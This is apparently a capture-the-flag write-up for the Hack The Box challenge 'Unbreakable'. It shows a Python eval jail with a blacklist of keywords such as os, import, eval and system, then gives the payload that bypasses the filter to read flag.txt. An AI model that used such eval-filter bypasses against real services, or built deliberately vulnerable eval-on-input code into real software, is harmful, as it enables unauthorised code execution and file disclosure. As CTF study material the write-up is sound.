Unbreakable

Personal Rating: Easy

We have a netcat interface that we can use to send commands. We need to bypass a filter to execute Python code to read the flag in the same folder as the script. I cleaned it up a little:

#!/usr/bin/python3

banner1 = 'banner1'
banner2 = 'banner2'

blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
              ' ', '-', '!', '[', ']', '*', 'import',
              'eval', 'banner', 'echo', 'cat', '%',
              '&', '>', '<', '+', '1', '2', '3', '4',
              '5', '6', '7', '8', '9', '0', 'b', 's',
              'lower', 'upper', 'system', '}', '{' ]

while True:
  ans = input('Break me, shake me!\n\n$ ').strip()

  if any(char in ans for char in blacklist):
    print(f'\n{banner1}\nNaughty naughty..\n')
  else:
    try:
      eval(ans + '()')
      print('WHAT WAS THAT?!\n')
    except:
      print(f"\n{banner2}\nI'm UNBREAKABLE!\n")

Our command gets any leading or trailing spaces removed.

Then the blacklist is applied.

If the blacklist did not block it, () is appended to the answer and that gets executed if its valid python code.

This seems to work so far, but it does not yet output the flag:

$ open('flag.txt','r').read
WHAT WAS THAT?!

$ print(open('flag.txt','r').read)#
<built-in method read of _io.TextIOWrapper object at 0x7f1d4ad1f5e0>
WHAT WAS THAT?!

Turns out this outputs the read function itself instead of executing it.

This worked:

$ print(open('flag.txt','r').read())#
HTB{3v4l_0r_3vuln??}

HTB{3v4l_0r_3vuln??}